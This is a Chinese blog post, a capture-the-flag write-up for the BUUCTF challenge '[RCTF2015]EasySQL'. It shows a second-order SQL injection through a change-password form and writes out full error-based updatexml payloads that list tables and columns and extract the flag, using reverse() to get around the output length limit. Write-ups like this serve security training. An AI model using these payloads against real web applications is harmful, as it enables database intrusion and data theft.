[RCTF2015]EasySQL

最新推荐文章于 2024-03-19 07:00:00 发布
最新推荐文章于 2024-03-19 07:00:00 发布
阅读量177 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/114674458
版权
  • 看到login和register界面 第一个想法就是二次注入
  • 但是我看到了change password
  • 想到了以前做过的一道题目
  • 尝试一了一下越权修改密码发现不行
  • 继续尝试二次注入吧
  • 在register.php页面注册账号

用户名:root
密码:123
email:123

  • 登录成功后 点击chage password页面
  • 修改密码发现报错
    在这里插入图片描述
  • 猜测一下执行的语句
select * from user where username ="root\" and pwd='65c94593b88237160dfd7305112eeed0'
  • 所以这里是一个二次注入,而且可以利用报错注入
    爆表
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
  • 三个表:article,flag,users
    爆字段
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#
  • flag
payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='article'))),1))#

-title,content

payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#
  • name,pwd,email,real_flag_1s_here

爆flag

payload:1"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

-flag{d235dfde-96b4-46dd-8c87-1f

payload:1"||(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

-}429d53aedbf1-78c8-dd64-4b69-ed

a = "}429d53aedbf1-78c8-dd64-4b69-ed"
b = a[::-1]
print(b)
  • 倒叙输出后的结果:de-96b4-46dd-8c87-1fbdea35d924}
  • 拼接一下得到flag:flag{d235dfde-96b4-46dd-8c87-1fbdea35d924}
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RCTF2015]EasySQL 1
m0_62879498的博客
05-21 1429
[RCTF2015]EasySQL 1 进入环境,发现注册页面和登录页面 我们尝试进行注册admin,页面回显用户存在,第一时间就想到了二次注入。 注册 admin"#,登录后更改密码,成功。登录admin ,发现和普通有用户没有区别。 之后就是寻找注入点,只有登陆界面,注册界面和changepwd界面可能存在存在sql注入。 我们知道二次注入主要是 插入恶意数据和引用恶意数据。 注册界面主要是进行一个插入数据,肯定需要一个界面进行恶意数据的引用。 我们在注册界面输入恶意数据分别进行尝试 尝试后发现,登
[RCTF2015]EasySQL1 题目分析与详解
2302_79800344的博客
02-25 1129
利用二次注入和报错注入处理问题。
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
RCTF2020.zip
07-20
RCTF2020 比赛逆向 pwn等赛题,除web题外所有赛题均有
rctf:redpwn的CTF平台
03-28
rCTF是redpwnCTF的CTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)...
Python库 | rctf-golf-1.0.0.tar.gz
03-10
本资源是一个名为“rctf-golf”的Python库,版本为1.0.0,封装在“rctf-golf-1.0.0.tar.gz”压缩包内。这个库可能是为了解决特定问题或提供某些功能而创建的,它通常包含一系列模块、脚本和文档,方便开发者在自己的...
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1146
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
[wp][RCTF2015]EasySQL
小飒的博客
07-05 421
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
[RCTF2015]EasySQL ---不会编程的崽
最新发布
不会编程的崽的博客
03-19 894
sql注入 二次注入
BUUCTF:[RCTF2015]EasySQL
末初的CSDN博客
03-29 3804
BUUCTF:[RCTF2015]EasySQL 参考:https://www.cnblogs.com/peri0d/p/11599643.html 先注册一个用户 在注册的时候,fuzz测试发现在username和email中过滤了以下字符: @ or and space(空格) substr mid left right handle 没有源码慢慢测试....... 登录,发现还有个改密...
刷题记录:[RCTF2015]EasySQL 1
weixin_48335916的博客
01-07 1451
首先在注册页面进行测试,发现在用户名中进行了过滤,过滤了substr,and,or等一些可以注入的字符,在这一栏进行了过滤,说明这里可能存在注入。 注册一个新的用户,用户名:123。密码:123 登陆用户,发现有一个修改密码的页面 进入该页面,进行测试,没有发现,重新回到注册页面,进行测试注册一个用户 username:1'" 登录并进入修改密码的页面,修改密码 发现出现报错,说明存在二次注入。猜测可能的sql语句为 select * from user where username="1'" "

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值